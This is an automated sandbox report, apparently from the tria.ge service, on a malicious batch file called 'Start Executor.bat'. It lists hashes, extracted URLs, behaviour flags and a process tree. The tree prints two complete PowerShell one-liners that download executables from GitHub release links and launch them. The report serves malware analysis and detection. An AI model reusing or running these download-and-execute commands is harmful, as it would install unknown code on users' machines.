Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
77s -
max time network
81s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
12/07/2024, 20:45
Static task
static1
Behavioral task
behavioral1
Sample
Start Executor.bat
Resource
win7-20240704-en
General
-
Target
Start Executor.bat
-
Size
551B
-
MD5
fe821790779e191b514f7d90b381d191
-
SHA1
03be2cfc52ec390a30209c33f7ea3a42589a0785
-
SHA256
6afbbef338a695004853bb806f146efdd2d216a1fa58cb34fd10509495b4415b
-
SHA512
425cdb0bd257a71a952293c77984635484dd30a6fc8c9f287100a99016ffc51a884442595eb6eed102fcbceebb6b01f609ba45f5fb2535a3156a8eef04ab50aa
Malware Config
Extracted
https://github.com/vlyian/scorpix/releases/download/vypix/Scorpix-ExecutorV3.exe
Extracted
https://github.com/vlyian/scorpixe/releases/download/vypix/ScorpixDLL.exe
Signatures
-
Blocklisted process makes network request 4 IoCs
flow pid Process 3 2064 powershell.exe 4 2064 powershell.exe 6 3060 powershell.exe 7 3060 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2064 powershell.exe 3060 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2064 powershell.exe Token: SeDebugPrivilege 3060 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2508 wrote to memory of 2064 2508 cmd.exe 30 PID 2508 wrote to memory of 2064 2508 cmd.exe 30 PID 2508 wrote to memory of 2064 2508 cmd.exe 30 PID 2508 wrote to memory of 3060 2508 cmd.exe 31 PID 2508 wrote to memory of 3060 2508 cmd.exe 31 PID 2508 wrote to memory of 3060 2508 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Start Executor.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2508 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $down=New-Object System.Net.WebClient;$url='https://github.com/vlyian/scorpix/releases/download/vypix/Scorpix-ExecutorV3.exe';$file='Scorpix-ExecutorV3.exe'; $down.DownloadFile($url,$file);$exec=New-Object -com shell.application;$exec.shellexecute($file);exit2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2064
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $down=New-Object System.Net.WebClient;$url='https://github.com/vlyian/scorpixe/releases/download/vypix/ScorpixDLL.exe';$file='ScorpixDLL.exe'; $down.DownloadFile($url,$file);$exec=New-Object -com shell.application;$exec.shellexecute($file);exit2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3060
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5bbbd657d0a0b9541d07602fc3823882e
SHA1c71e244465c2513cf847e7087ef34ed05c49a64d
SHA256762ddc836e3e8d684711371eae034b69aaa3d313c7a8600f98ca473928a1f353
SHA5120e5c9b932889bc8cf736dca9dd690a4fc4e6fea17d94f9698252c6922c30f019a2dc86228db83ea608d99afa1afa6af2e0ed99739f8a59ff91758f1450e1241e